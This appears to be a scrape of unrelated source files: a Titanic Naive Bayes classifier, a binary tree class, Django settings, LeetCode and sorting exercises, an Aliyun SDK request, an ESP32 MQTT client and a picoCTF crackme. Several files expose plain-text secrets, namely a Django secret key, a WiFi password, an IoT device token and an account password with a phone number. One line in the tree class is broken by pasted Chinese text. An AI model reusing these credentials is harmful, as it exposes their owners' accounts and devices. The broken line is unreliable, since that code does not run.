# 如果有标题可以省略header,names ;sep 为数据分割符
df = pd.read_csv(dataPath, sep=",")
# 填充缺失值
df["Age"] = df["Age"].fillna(df["Age"].median())
df['Embarked'] = df['Embarked'].fillna('S')
# df = df.fillna(0)
# 数据量化
# 文本量化
df.replace("male", 0, inplace=True)
df.replace("female", 1, inplace=True)
df.loc[df["Embarked"] == "S", "Embarked"] = 0
df.loc[df["Embarked"] == "C", "Embarked"] = 1
df.loc[df["Embarked"] == "Q", "Embarked"] = 2
# 划分出特征数据与标签数据
X = df.drop(["PassengerId","Survived","Name","Ticket","Cabin"], axis=1) # 特征数据
y = df.Survived # or df["Survived"] # 标签数据
# 数据归一化
X = (X - np.min(X, axis=0)) / (np.max(X, axis=0) - np.min(X, axis=0))
# 使用sklearn方式
# X = MinMaxScaler().transform(X)
# 查看df信息
# df.info()
# df.describe()
return (X.to_numpy(), y.to_numpy())
class NaiveBayesClassifier(object):
def __init__(self,save_file="model.ckpt"):
self.save_file = save_file
def fit(self,X:np.array,y:np.array):
if not os.path.exists(self.save_file):
# 计算分成每个类别的概率值
dict_y = dict(Counter(y))
dict_y = {k:v/len(y) for k,v in dict_y.items()}
# 计算每维特征每个特征值发生概率值
unique_label = list(set(y))
dict_feature_value={} # 每个特征每个值对应的概率
for col in range(len(X[0])):
data = X[...,col] # 每列特征
unique_val = list(set(data))
for val in unique_val:
dict_feature_value[str(col)+"_"+str(val)] = np.sum(data==val)/len(data)
dict_feature_value_label = {} # 每个类别发生对应的每个特征每个值的概率
for label in unique_label:
datas = X[y==label]
for col in range(len(datas[0])):
data = datas[..., col] # 每列特征
unique_val = list(set(data))
for val in unique_val:
dict_feature_value_label[str(label)+"_"+str(col)+"_"+str(val)]=np.sum(data==val)/len(data)
# save
result={"dict_y":dict_y,"dict_feature_value":dict_feature_value,
"dict_feature_value_label":dict_feature_value_label}
pickle.dump(result,open(self.save_file,"wb"))
# return dict_y,dict_feature_value,dict_feature_value_label
def __predict(self,X:np.array):
data = pickle.load(open(self.save_file,"rb"))
dict_y, dict_feature_value, dict_feature_value_label = data["dict_y"],data["dict_feature_value"],\
data["dict_feature_value_label"]
labels = sorted(list(dict_y.keys()))
# 计算每条数据分成每个类别的概率值
preds = np.zeros([len(X),len(labels)])
for i,x in enumerate(X):
for j,label in enumerate(labels):
p1 = 1
p2 = 1
for col,val in enumerate(x):
p1*= dict_feature_value_label[str(label)+"_"+str(col)+"_"+str(val)] if str(label)+"_"+str(col)+"_"+str(val) \
in dict_feature_value_label else self.__weighted_average(str(label)+"_"+str(col)+"_"+str(val),dict_feature_value_label) # self.__fixed_value()
p2*= dict_feature_value[str(col)+"_"+str(val)] if str(col)+"_"+str(val) in dict_feature_value else \
self.__weighted_average(str(col)+"_"+str(val),dict_feature_value) # self.__fixed_value()
preds[i,j] = p1*dict_y[label]/p2
return preds
def __fixed_value(self):
return 1e-3
def __weighted_average(self,key:str,data_dict:dict):
"""插值方式找到离该key对应的最近的data_dict中的key做距离加权平均"""
tmp = key.split("_")
value = float(tmp[-1])
if len(tmp)==3:
tmp_key = tmp[0]+"_"+tmp[1]+"_"
else:
tmp_key = tmp[0] + "_"
# 找到相关的key
# related_keys = []
values = [value]
for k in list(data_dict.keys()):
if tmp_key in k:
# related_keys.append(k)
values.append(float(k.split("_")[-1]))
# 做距离加权
values = sorted(values)
index = values.index(value)
# 取其前一个和后一个做插值
last = max(0,index-1)
next = min(index+1,len(values)-1)
if index==last or index==next:
return self.__fixed_value()
else:
d1=abs(values[last] - value)
d2=abs(values[next] - value)
v1 = data_dict[tmp_key+str(values[last])]
v2 = data_dict[tmp_key+str(values[next])]
# 距离加权 y=e^(-x)
return (np.log(d1)*v1+np.log(d2)*v2)/(np.log(d1)+np.log(d2))
def predict_proba(self,X:np.array):
return self.__predict(X)
def predict(self,X:np.array):
return np.argmax(self.__predict(X),-1)
def accuracy(self,y_true:np.array,y_pred:np.array)->float:
return round(np.sum(y_pred==y_true)/len(y_pred),5)
if __name__=="__main__":
dataPath = "../../dataset/titannic/train.csv"
X, y = loadData(dataPath)
# 划分训练集与测试集
X_train, X_test, y_train, y_test = train_test_split( X, y, test_size=0.2, random_state=40)
start = time.time()
clf = NaiveBayesClassifier()
clf.fit(X_train,y_train)
y_pred = clf.predict(X_test)
print("cost time:%.6f(s) acc:%.3f"%(time.time()-start,clf.accuracy(y_test,y_pred)))
# cost time:0.089734(s) acc:0.771
# 使用sklearn 的GaussianNB
start = time.time()
clf = GaussianNB()
clf.fit(X_train,y_train)
y_pred = clf.predict(X_test)
print("cost time:%.6f(s) acc:%.3f" % (time.time() - start, accuracy_score(y_test, y_pred)))
# cost time:0.001023(s) acc:0.810
# 使用sklearn 的DecisionTreeClassifier
start = time.time()
clf = DecisionTreeClassifier()
clf.fit(X_train, y_train)
y_pred = clf.predict(X_test)
print("cost time:%.6f(s) acc:%.3f" % (time.time() - start, accuracy_score(y_test, y_pred)))
# cost time:0.008215(s) acc:0.816
# 使用sklearn 的RandomForestClassifier
start = time.time()
clf = RandomForestClassifier()
clf.fit(X_train, y_train)
y_pred = clf.predict(X_test)
print("cost time:%.6f(s) acc:%.3f" % (time.time() - start, accuracy_score(y_test, y_pred)))
# cost time:0.018951(s) acc:0.782 | [
"gzcl_wcon@126.com"
] | gzcl_wcon@126.com |
38a90854558605e5a014f7e6272b4f3c11060c65 | 265a07a2becd232b292872d1d7136789463874be | /lianxi代码/erchashu.py | 5543da1004e52bdcd18148677402156b24dcc306 | [] | no_license | Lz0224/Python-exercise | f4918b8cd5f7911f0c35c0458c2269959937d07d | 3d09f54aebc653f4a5b36765b25c7241e3960764 | refs/heads/master | 2020-12-24T22:20:55.573019 | 2017-08-11T07:18:16 | 2017-08-11T07:18:16 | 100,005,776 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,647 | py | #!/usr/bin/python
#coding=utf-8
'''
created bu zwg in 2017-7-8
'''
import copy
class node(object):
def __init__(self, name, data):
self.data = data
self.name = name
self.Rchild = None
self.Lchild = None
self.child_number = 0
self.parent = None
def add_Rchild(self, node):
if self.Rchild is not None:
self.Rchild = node
else:
self.Rchild = node
self.child_number += 1
node.set_parent(self)
def drop_Rchild(self):
self.Rchild = None
self.child_number -= 1
def set_parent(self, node):
self.parent = node
def add_Lchild(self, node):
if self.Lchild is not None:
self.Lchild = node
else:
self.Lchild = node
self.child_number += 1
node.set_parent(self)
def drop_Lchild(self):
self.Lchild = None
self.child_number -= 1
class tree(object):
def __init__(self, node):
self.parent = node
self.depth = 1
self.all_node =用递归访问子节 {node.name:node}
self.enable_node = {node.name:node}
c1 = node.Rchild
c2 = node.Lchild
C = [c1, c2]
B = [i for i in C if i is not None]
if len(B) == 2:
del self.enable_node[node.name]
while len(B) != 0:
self.depth += 1
C = copy.copy(B)
for i in B:
C.remove(i)
if i.Rchild is not None:
C.append(i.Rchild)
if i.Lchild is not None:
C.append(i.Lchild)
| [
"Lz0o_o0@outlook.com"
] | Lz0o_o0@outlook.com |
eeaee40200b52c8964177e6365c6f24ec9f71958 | 9d3afabc34566173b16ebc9c352b14a1b7d85ad9 | /FamBudget/settings.py | e0596f9b15b5ab400c88d6f8cf1ba30804fd550f | [] | no_license | Romantano/Family-Budget | ec7625b2d6c8613610b9c1d6c680a5ff38fa5045 | 212337cb13322892cf5e104fd4af848eff8b1d73 | refs/heads/master | 2020-03-22T00:30:26.586466 | 2018-07-08T20:21:44 | 2018-07-08T20:21:44 | 139,249,040 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,143 | py | """
Django settings for FamBudget project.
Generated by 'django-admin startproject' using Django 1.11.13.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '^47mt_9we07cagjd2@p2tfvx2nhn#%(#^vh+rm8dorp(_g+#vv'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'Planning',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'FamBudget.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [BASE_DIR, 'templates'],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'FamBudget.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'ru-ru'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
| [
"antonsvz@gmail.com"
] | antonsvz@gmail.com |
b8e02a80dd4ae30959b434085ed27933a2f54964 | ae3d0e3c2fb614d96f6c787583c6e2e4cb654ad4 | /leetcode/89. 格雷编码.py | 6efb740a93fba7e0c11adf3290a8e415330f35cf | [] | no_license | Cjz-Y/shuati | 877c3f162ff75f764aa514076caccad1b6b43638 | 9ab35dbffed7865e41b437b026f2268d133357be | refs/heads/master | 2023-02-02T10:34:05.705945 | 2020-12-14T01:41:39 | 2020-12-14T01:41:39 | 276,884,136 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 921 | py | from typing import List
class Solution:
def grayCode(self, n: int) -> List[int]:
if n == 0:
return [0]
current = '0' * n
ans = [current]
use = set()
use.add(current)
while current:
next = None
sl = list(current)
for i in range(len(current)):
if sl[i] == '0':
sl[i] = '1'
else:
sl[i] = '0'
temp = ''.join(sl)
if temp not in use:
use.add(temp)
next = temp
ans.append(temp)
break
else:
if sl[i] == '0':
sl[i] = '1'
else:
sl[i] = '0'
current = next
ans = [int(item, 2) for item in ans]
return ans
| [
"cjz.y@hotmail.com"
] | cjz.y@hotmail.com |
825f83d74c3367408205ccb1cc9c5bf61fb0b590 | 85c52a7c8cc21060e1511da1df02162e5fc78378 | /tests/test_models.py | 5ae3bb97d0b73a3979fb5b85dcb4b3b7f6e40b14 | [] | no_license | ramonabmello/desafio_starwars | d3720f236c316bda9d916b454f3314f36dd3a336 | 23ba32ba5af95c8360e7c929253f6d33bfc8c1dc | refs/heads/master | 2020-03-31T23:33:02.484009 | 2018-10-30T15:42:41 | 2018-10-30T15:42:41 | 152,659,986 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,026 | py | import unittest
from game_star_wars import models
class TestPlanet(unittest.TestCase):
def test_has_id(self):
planet = models.Planet(id=1)
assert planet.id == 1
def test_has_name(self):
planet = models.Planet(name='Tatooine')
assert planet.name == 'Tatooine'
def test_has_climate(self):
planet = models.Planet(climate='arid')
assert planet.climate == 'arid'
def test_has_terrain(self):
planet = models.Planet(terrain='desert')
assert planet.terrain == 'desert'
def test_representation(self):
planet = models.Planet(
id=1,
name='Tatooine',
climate='arid',
terrain='desert'
)
expected = 'Planet: Tatooine\nClimate: arid\nTerrain: desert'
assert repr(planet) == expected
def test_number_of_movie_appearances(self):
planet = models.Planet(name='Tatooine')
assert planet.number_of_movie_appearances == 5
| [
"contato@ramonamello.com.br"
] | contato@ramonamello.com.br |
0b573c7d0218cd57688f0d50721997333fe6315d | 83de24182a7af33c43ee340b57755e73275149ae | /aliyun-python-sdk-cbn/aliyunsdkcbn/request/v20170912/CreateTransitRouteTableAggregationRequest.py | 33fc8ff3c8ce5418023c4de179e733b508294cf5 | [
"Apache-2.0"
] | permissive | aliyun/aliyun-openapi-python-sdk | 4436ca6c57190ceadbc80f0b1c35b1ab13c00c7f | 83fd547946fd6772cf26f338d9653f4316c81d3c | refs/heads/master | 2023-08-04T12:32:57.028821 | 2023-08-04T06:00:29 | 2023-08-04T06:00:29 | 39,558,861 | 1,080 | 721 | NOASSERTION | 2023-09-14T08:51:06 | 2015-07-23T09:39:45 | Python | UTF-8 | Python | false | false | 4,095 | py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkcbn.endpoint import endpoint_data
class CreateTransitRouteTableAggregationRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'Cbn', '2017-09-12', 'CreateTransitRouteTableAggregation')
self.set_method('POST')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
def get_ResourceOwnerId(self): # Long
return self.get_query_params().get('ResourceOwnerId')
def set_ResourceOwnerId(self, ResourceOwnerId): # Long
self.add_query_param('ResourceOwnerId', ResourceOwnerId)
def get_ClientToken(self): # String
return self.get_query_params().get('ClientToken')
def set_ClientToken(self, ClientToken): # String
self.add_query_param('ClientToken', ClientToken)
def get_TransitRouteTableAggregationDescription(self): # String
return self.get_query_params().get('TransitRouteTableAggregationDescription')
def set_TransitRouteTableAggregationDescription(self, TransitRouteTableAggregationDescription): # String
self.add_query_param('TransitRouteTableAggregationDescription', TransitRouteTableAggregationDescription)
def get_TransitRouteTableAggregationName(self): # String
return self.get_query_params().get('TransitRouteTableAggregationName')
def set_TransitRouteTableAggregationName(self, TransitRouteTableAggregationName): # String
self.add_query_param('TransitRouteTableAggregationName', TransitRouteTableAggregationName)
def get_DryRun(self): # Boolean
return self.get_query_params().get('DryRun')
def set_DryRun(self, DryRun): # Boolean
self.add_query_param('DryRun', DryRun)
def get_ResourceOwnerAccount(self): # String
return self.get_query_params().get('ResourceOwnerAccount')
def set_ResourceOwnerAccount(self, ResourceOwnerAccount): # String
self.add_query_param('ResourceOwnerAccount', ResourceOwnerAccount)
def get_TransitRouteTableAggregationScope(self): # String
return self.get_query_params().get('TransitRouteTableAggregationScope')
def set_TransitRouteTableAggregationScope(self, TransitRouteTableAggregationScope): # String
self.add_query_param('TransitRouteTableAggregationScope', TransitRouteTableAggregationScope)
def get_OwnerAccount(self): # String
return self.get_query_params().get('OwnerAccount')
def set_OwnerAccount(self, OwnerAccount): # String
self.add_query_param('OwnerAccount', OwnerAccount)
def get_OwnerId(self): # Long
return self.get_query_params().get('OwnerId')
def set_OwnerId(self, OwnerId): # Long
self.add_query_param('OwnerId', OwnerId)
def get_TransitRouteTableId(self): # String
return self.get_query_params().get('TransitRouteTableId')
def set_TransitRouteTableId(self, TransitRouteTableId): # String
self.add_query_param('TransitRouteTableId', TransitRouteTableId)
def get_TransitRouteTableAggregationCidr(self): # String
return self.get_query_params().get('TransitRouteTableAggregationCidr')
def set_TransitRouteTableAggregationCidr(self, TransitRouteTableAggregationCidr): # String
self.add_query_param('TransitRouteTableAggregationCidr', TransitRouteTableAggregationCidr)
| [
"sdk-team@alibabacloud.com"
] | sdk-team@alibabacloud.com |
82ffedb3852ee703562896da5953bc3f42e421c0 | 00dac6306847966655de49a2df06324353eb2055 | /blog/migrations/0010_post_slug.py | a9e1fe55083ccbc00db4f410b14332d940964f41 | [] | no_license | abdullahshaker10/Django_blog | 9807f3182f9419ad18b547c0f4e4a51c2e976284 | 57ed6267ad475409b1c5fd2719f8c3161153da2d | refs/heads/master | 2023-01-08T22:06:34.708601 | 2020-11-18T16:44:52 | 2020-11-18T16:44:52 | 313,996,653 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 444 | py | # Generated by Django 3.0.3 on 2020-04-20 10:14
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('blog', '0009_post_status'),
]
operations = [
migrations.AddField(
model_name='post',
name='slug',
field=models.SlugField(blank=True, max_length=250, null=True, unique_for_date='post_publish'),
),
]
| [
"abdullah.shaker2017@gmail.com"
] | abdullah.shaker2017@gmail.com |
a95e462de46aa655ccb705a450d4494d912669e4 | 0b3ff7bc2a5a82b999159bc252a5e00a7175741d | /ThingsBoard Sources/Data Encryption & Security/esp32ConnectFinalScript.py | 02b903a32cc19407d6dd1b1a6d6092fa91cf2cc6 | [] | no_license | AbanobMedhat/GP2020 | c77156b39f16665837535182a7b9fb05ba7ee28f | 54413893aba13592ff0823c96ee6b43566411c10 | refs/heads/master | 2023-02-14T13:57:57.945954 | 2020-08-24T01:31:06 | 2020-08-24T01:31:06 | 211,509,039 | 0 | 1 | null | 2021-01-06T09:11:31 | 2019-09-28T14:01:05 | QML | UTF-8 | Python | false | false | 1,607 | py | import machine
import time
from machine import Pin, PWM
from umqtt.simple import MQTTClient
from time import sleep
import random
import json
import network
import ussl
# WiFi connection information
wifiSSID = 'Not_found'
wifiPassword = 'MOHAMED@AHMED?ESLAM!2006'
# turn off the WiFi Access Point
ap_if = network.WLAN(network.AP_IF)
ap_if.active(False)
# connect the ESP32 device to the WiFi network
wifi = network.WLAN(network.STA_IF)
wifi.active(True)
wifi.connect(wifiSSID, wifiPassword)
# wait until the device is connected to the WiFi network
MAX_ATTEMPTS = 20
attempt_count = 0
while not wifi.isconnected() and attempt_count < MAX_ATTEMPTS:
attempt_count += 1
time.sleep(1)
if attempt_count == MAX_ATTEMPTS:
print('could not connect to the WiFi network')
sys.exit()
# Connect to Thingsboard server using port 8883 as secure port
def connect():
# Device Token
username="nSKYuguLUV2Iijjp6JWB"
# Host IP
broker= "18.191.196.152"
# Required Destination of Data
topic = "v1/devices/me/telemetry"
Mqtt_CLIENT_ID = "ABSE"
PASSWORD=""
# SSL Certificate Path in Esp32
ssl_params = {'cert':'mqttserver.pub.pem'}
client = MQTTClient(client_id=Mqtt_CLIENT_ID, server=broker, port=8883, user=username,
password=PASSWORD, keepalive=10000, ssl=True, ssl_params=ssl_params)
try:
client.connect()
except OSError:
print('Connection failed')
sys.exit()
data = dict()
# Data Sent
data["TempData"] = 60
data2=json.dumps(data)#convert it to json
print('connection finished')
client.publish(topic,data2)
print("Done")
time.sleep(5)
connect() | [
"abanobmedhat42@gmail.com"
] | abanobmedhat42@gmail.com |
f64b9082e64ef553e39e90db9d5ebb2f27e8d5dd | 33cea355339e424acfd3fe8180974166fc4639fd | /sorting/selectionsort.py | 3aa3e2a69bb8226e8223a5955d54c2c4db671dda | [
"MIT"
] | permissive | jrtechs/RandomScripts | e32d4a48b7ee1ffa6aa7b45b974d2d47ac04dd9b | f5ae872fa584de8c885eb4ad1673d152ae6be37b | refs/heads/master | 2021-06-26T18:42:33.811342 | 2020-08-09T20:41:29 | 2020-08-09T20:41:29 | 151,647,447 | 4 | 30 | MIT | 2020-10-02T20:06:39 | 2018-10-04T23:18:31 | Jupyter Notebook | UTF-8 | Python | false | false | 278 | py | #selection sorting
import sys
A = [6, 2, 1, 3, 4]
for i in range(len(A)):
min_index = i
for j in range(i+1, len(A)):
if A[min_index] > A[j]:
min_index = j
A[i], A[min_index] = A[min_index], A[i]
print ("Sorted array")
for i in range(len(A)):
print("%d" %A[i])
| [
"noreply@github.com"
] | jrtechs.noreply@github.com |
f9fb7a7b37c9fe9aedc4c412916e84f333bff2cb | 4828d5b3954183728b6267be39732fe3587d20b7 | /fxm/strategy/admin.py | 6e34a1b25003fbf094365306bae116fb32e07f62 | [
"Apache-2.0"
] | permissive | panyuan5056/fx | bd9a2cd90ff0825ad4340414c8131e3737ba0e60 | 24ca8dd57de7534e4d20cfbf2890607a1741dc70 | refs/heads/main | 2023-07-20T07:06:38.941708 | 2021-08-28T04:32:11 | 2021-08-28T04:32:11 | 400,700,450 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,187 | py | try:
import simplejson as json
except Exception as e:
import json
from datetime import datetime as dt
import requests
from django.contrib import admin
from django.conf import settings
from django import forms
from .models import Strategy
#from flyadmin.widget.forms import SelectBoxWidget, TimelineWidget, EditorWidget, DateTimeWidget, UploadImagesWidget, InputNumberWidget, UploadFileWidget, StepsWidget, StepsNormalWidget
class StrategyAdminForm(forms.ModelForm):
class Meta:
model = Strategy
widgets = {}
fields = '__all__'
def __init__(self, *args, **kwargs):
super(StrategyAdminForm, self).__init__(*args, **kwargs)
class StrategyAdmin(admin.ModelAdmin):
form = StrategyAdminForm
list_display = ('name', 'class1', 'class2', 'class3', 'dept', 'category', 'forward', 'update_time')
search_fields = ('name', )
def get_form(self, request, obj=None, **kwargs):
form = super(StrategyAdmin, self).get_form(request, obj, **kwargs)
return form
def get_queryset(self, request):
qs = super(StrategyAdmin, self).get_queryset(request)
return qs.filter()
admin.site.register(Strategy, StrategyAdmin)
| [
"panyy@idss-cn.com"
] | panyy@idss-cn.com |
5788896282ea8056f79d78e57224a9bef3acac4f | 6ef84e7122122db3c3586e9cf718d8383b38ce23 | /picoCTF2021/crackme-py/crackme.py | e96a1556f9e141d53716c53de091c9c65e743fd3 | [] | no_license | greytabby/CTF | 5612c5d84f12b0ea5d2309087d0753ece1cd033f | 59b7b2de75fdcb68494e26e7b08e5c8b79142387 | refs/heads/master | 2021-06-08T12:02:57.410722 | 2021-05-30T11:42:44 | 2021-05-30T11:42:44 | 155,959,909 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,461 | py | # Hiding this really important number in an obscure piece of code is brilliant!
# AND it's encrypted!
# We want our biggest client to know his information is safe with us.
bezos_cc_secret = "A:4@r%uL`M-^M0c0AbcM-MFE055a4ce`eN"
# Reference alphabet
alphabet = "!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ"+ \
"[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~"
def decode_secret(secret):
"""ROT47 decode
NOTE: encode and decode are the same operation in the ROT cipher family.
"""
# Encryption key
rotate_const = 47
# Storage for decoded secret
decoded = ""
# decode loop
for c in secret:
index = alphabet.find(c)
original_index = (index + rotate_const) % len(alphabet)
decoded = decoded + alphabet[original_index]
print(decoded)
def choose_greatest():
"""Echo the largest of the two numbers given by the user to the program
Warning: this function was written quickly and needs proper error handling
"""
user_value_1 = input("What's your first number? ")
user_value_2 = input("What's your second number? ")
greatest_value = user_value_1 # need a value to return if 1 & 2 are equal
if user_value_1 > user_value_2:
greatest_value = user_value_1
elif user_value_1 < user_value_2:
greatest_value = user_value_2
print( "The number with largest positive magnitude is "
+ str(greatest_value) )
choose_greatest()
| [
"munchkin.coco@gmail.com"
] | munchkin.coco@gmail.com |
ecbaded27dd99a47aef58b83106df29e1c158f97 | da1001157b7458f86f101384a68ac33876d1c3ab | /break_time.py | 884dbc2e9dc8df413db775fa1898a954eb0f6b4d | [] | no_license | drbree82/Udacity | 374f55605029d02b3dc3375af8ea5ed2230f3542 | 89cce7b677dc80cc37394a04e36870dd84cf36f9 | refs/heads/master | 2020-04-04T16:18:28.451209 | 2015-02-07T23:19:49 | 2015-02-07T23:19:49 | 30,474,026 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 143 | py | import webbrowser
import time
for breaks in range(0, 3):
time.sleep(2)
webbrowser.open("https://www.youtube.com/watch?v=HTN6Du3MCgI")
| [
"drbree82@gmail.com"
] | drbree82@gmail.com |
f8c69218110569d35951f0af4f65eca22deaa0cd | 89e2bdaece138d16bd6c661318561b8644a09999 | /webapplication/opencv/opencv.py | 90a8bab4187adbf8fa868f7b3dffc1c1b52f7ee3 | [] | no_license | hafugg110/fir- | 5c91c6a62dbe46cbc2a1ed0b2c9b756a3664db66 | c68ded0f3950a31f9a866322d1d4b3a74efd2673 | refs/heads/master | 2023-04-25T02:11:12.669020 | 2021-05-12T02:47:33 | 2021-05-12T02:47:33 | 345,895,732 | 0 | 0 | null | 2021-03-10T06:46:57 | 2021-03-09T05:40:12 | null | UTF-8 | Python | false | false | 270 | py | from flask import Flask
app = Flask(__name__)
@app.route('/')
def index():
return 'Hello, world.'
@app.route('/')
def index():
# 顯示表單
return 'Hello, world.'
@app.route('/', methods=['POST'])
def process():
# 處理圖片
return 'Process' | [
"haha110099@gmail.com"
] | haha110099@gmail.com |
544a76304660251df0418c0ad36bbc153dd44bdd | 6434944419969a10bffe29fbc51b3d3213acdf39 | /data_structures_homeworks/percolation/run_stats.py | 613c71171de94e52ea9e39e19727b20fad696ccb | [] | no_license | ngozinwogwugwu/exercises | bbd76e0bbb84a96074b1e9c9ae659d6c470b33bf | a8d96de3c8ddd27566d65e7ce168b74ff989da6a | refs/heads/master | 2021-03-30T10:41:15.043410 | 2020-06-03T15:53:41 | 2020-06-03T15:53:41 | 248,045,755 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 204 | py | from percolation_stats import PercolationStats
ps = PercolationStats(20, 500)
print('measurement 1: ' + str(ps.mean()))
print('measurement 2: ' + str(ps.mean()))
print('measurement 3: ' + str(ps.mean()))
| [
"ngozi.n.nwogwugwu@gmail.com"
] | ngozi.n.nwogwugwu@gmail.com |
cfaea0af904f507dc6e398516b1f31496c700364 | 8f9a05bf34dc5a1b6d78149c621338169e98e187 | /Social promotion/test_1.py | 9961026cc8787766a9679c04da4ccb0c0511596e | [] | no_license | susu1988/showroom | bf6ae99d561da425a24b73ad544e22d0723e0a42 | 81e867fb09a3c011274420fd051bd80ce765965c | refs/heads/master | 2021-03-05T15:18:28.016176 | 2019-08-13T12:15:13 | 2019-08-13T12:15:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,102 | py | # -*- coding: utf-8 -*-
# @Author : Zhy
import base64
import requests
from setting import *
import json
# task_2 = '{"isOperate":0,"act":"taskOperate","taskList":[{"isOpen":0,"endDate":"","contentId":"8ca9857fc47346c79191f19f6fd56c09","headUrl":"","inputTime":{"date":1,"hours":14,"seconds":58,"month":3,"timezoneOffset":-480,"year":119,"minutes":57,"time":1554101878000,"day":1},"channelType":3,"todayCount":0,"groupKey":"","limitKey":"","orgId":"rd","imageUrl":"","nickname":"","inputAcc":"rd001","groupClass":"","id":"9a114875e2dd46b2805dbc66f56d9f0e","text":"","orderKey":"","taskAcc":"aaas","updateAcc":"","updateTime":null,"focusNum":0,"ownerAcc":"rd001","generalizeType":1,"isDel":0,"startDate":""},{"isOpen":0,"endDate":"","contentId":"196c8fabe2d54d63a3c05a1265fd3e4a","headUrl":"","inputTime":{"date":2,"hours":11,"seconds":8,"month":3,"timezoneOffset":-480,"year":119,"minutes":21,"time":1554175268000,"day":2},"channelType":3,"todayCount":0,"groupKey":"","limitKey":"","orgId":"rd","imageUrl":"","nickname":"","inputAcc":"rd001","groupClass":"","id":"e2a0c7b9428f43f6888627a919d61f07","text":"","orderKey":"","taskAcc":"13018956681","updateAcc":"","updateTime":null,"focusNum":0,"ownerAcc":"rd001","generalizeType":1,"isDel":0,"startDate":""}],"orgId":"rd","boxId":"2000"}'
task_2={'startDate': '', 'channelType': 3, 'accountId': 'ab96ac5d24eb41babcf38b770d794d31', 'updateAcc': '', 'imageUrl': '', 'focusNum': 0, 'endDate': '', 'password': 'zhy200817436', 'contentId': 'aaba011b9d9f43c297fd1dd6b5153673', 'id': '1689ffc7f7c14acabb58d1328acf00f6', 'orgId': 'qfzn', 'todayCount': 0, 'ownerAcc': 'qfzn002', 'groupClass': '', 'isDel': 0, 'headUrl': '', 'inputAcc': 'qfzn002', 'text': '哈哈哈', 'limitKey': '', 'updateTime': None, 'nickname': '', 'taskAcc': '13018956681', 'inputTime': {'time': 1556102409000, 'minutes': 40, 'seconds': 9, 'hours': 18, 'month': 3, 'year': 119, 'timezoneOffset': -480, 'day': 3, 'date': 24}, 'isOpen': 0, 'groupKey': '', 'orderKey': '', 'generalizeType': 1}
